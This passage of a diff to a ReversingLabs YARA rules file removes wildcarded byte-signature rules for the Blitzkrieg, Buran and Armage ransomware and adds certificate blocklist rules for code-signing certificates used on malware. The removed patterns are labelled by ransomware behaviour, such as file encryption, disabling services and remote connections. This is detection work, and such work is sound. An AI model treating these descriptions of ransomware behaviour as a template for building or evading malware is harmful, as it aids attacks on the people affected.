-            C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1
-            74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ??
-            48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33
-            C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ??
-            0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ??
-            ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ??
-            4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ??
-            75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B
-            CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48
-            C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39
-            7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ??
-            48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0
-            48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files_win64 ) and ( all of ( $encrypt_files_win64_p* ) ) and ( all of ( $encrypt_network_shares_win64_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Blitzkrieg ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "078f7f9d-edd4-52b4-a30e-e968542da95c"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13856-L13872"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f"
+		logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Blitzkrieg"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ??
-            ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88
-            43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8
-            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C
-            82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$search_files_p1 = {
-            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40
-            ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ??
-            74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ??
-            48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ??
-            ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54
-            11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45
-            ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF
-            52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-        }
-		$search_files_p2 = {
-            E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B
-            ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B
-            45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
-            EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
-            8B 48 ?? 8B 45 ?? E8
-        }
-		$disable_services_p1 = {
-            E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-        }
-		$disable_services_p2 = {
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "863a109c-034f-5168-9470-8fd4945e6e92"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13874-L13890"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $disable_services_p* ) ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Buran ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2a36a8b-5c21-5c31-994d-b424c038dd21"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13892-L13910"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4"
+		logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Buran"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33
-            C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ??
-            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84
-            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
-            74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9
-        }
-		$encrypt_files = {
-            53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89
-            C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89
-            43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74
-            ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B
-            ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B 03 8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
-            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 BE ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? 6A ?? 8B 45 ?? E8
-        }
-		$remote_connection_p2 = {
-            50 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 70 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 56 8B 45
-            ?? 8B 40 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 EB ?? 83 7D ?? ?? 74 ?? 8D 95 ??
-            ?? ?? ?? 8B 4D ?? 8B 45 ?? 8B 30 FF 56 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 8B 45 ?? 8B 30 FF 56 ?? 8B C3 8B 55 ?? 8B 52 ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "smnetworks" and ( pe.signatures [ i ] . serial == "00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures [ i ] . serial == "f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" ) and 1277769600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Armage ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "94cf639b-7d9e-51ca-b547-e0d591581df2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9a363a84-c21c-5afe-9812-9ce16962b28a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
